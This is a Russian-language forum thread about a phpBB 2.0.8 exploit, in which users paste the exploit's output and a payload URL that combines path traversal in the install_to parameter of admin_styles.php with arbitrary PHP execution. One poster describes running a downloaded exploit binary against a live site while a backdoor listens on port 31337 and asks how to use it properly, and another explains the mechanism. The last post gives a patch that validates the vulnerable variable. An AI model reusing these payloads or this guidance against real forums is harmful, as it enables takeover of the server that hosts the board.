Хм,Экслоит работает. Вываливает - на работать с этим сидом не хочет.Права обычного пользователя. phpBB 2.0.8 _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperй ... 0505f3653237eec312e11bb1b9b6980f http://www.bugs.ru/?sid=0505f3653237eec312e11bb1b9b6980f _ recuperation du nom de la table sql ... phpbb OK _ Injection de la fake templates ...OK _ Fichier crйe _ Code executй http://www.bugs.ru/admin/admin_styles.php?mode=addnew&instal l_to=../../../../../../../../../../../../../../../../../../. ./tmp&nigga=phpinfo();&sid=0505f3653237eec312e11bb1b9b6980f
Объясните, как это юзать правильно? Я вот что делал: на одном из левых серверов (217.118.81.xxx)открыл бэкдор на 31337 порту, далеее запустил бинарник (не компилил сам, а в нете нашел потом D:\phpbbexp.exe http://www.bugs.ru 217.118.81.xxx 31337 он мне выдает _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperй ... 0505f3653237eec312e11bb1b9b6980f http://www.bugs.ru/?sid=0505f3653237eec312e11bb1b9b6980f _ recuperation du nom de la table sql ... phpbb OK _ Injection de la fake templates ...OK _ Fichier crйe
На этом всё..на других сайтах так же..как его правильно юзать?
нее...тут фича не в этом...я под админом и так залогинюсь, эта бага еще 2 недели назад была найдена с куками..тут прикол в другом..сплойт сначала делает тебя админом, а потом с помощью хитрых манипуляций в админке отдает тебе весь сервак, на котором расположен форум
ну посмотри сам код сплойта он создает запись в бд (через бэкап) с фейковым дизайном (темплэйтом), в котором встроена (в смысле присутствует запись в бд) функция eval(), а потом через admin_styles.php выполняет произвольный код в системе, используя эту запись..вот только все до конца я не понял...надо изучить код внимательно
Короче, ребята, все ясно. 1) вход на сайт по кукам (от 1 марта 2005 баг, http://www.securitylab.ru/52986.html ) 2) бэкап/что-то-там, фигня короче 3) вход на admin/admin_styles.php и дополнительный взлом. лечится просто: 1) пропатчить баг с куками 2) в admin/admin_styles.php сделать: найти: switch( $mode ) { case "addnew": $install_to = ... $style_name = ... после этого добавить: $regs = ""; if(ereg("[A-Za-z0-9\_-]+", $install_to,$regs)) { $install_to = $regs[0]; } else { unset($install_to); }
Это простая проверка валидности переменной $install_to: то есть она может содержать только буквы (A-Z и a-z), цифры (0-9), дефис (-) и знак подчеркивания (_) если знак подчеркивания и дефис не нужны, то пишем: ... if(ereg("[A-Za-z0-9]+", $install_to,$regs)) ...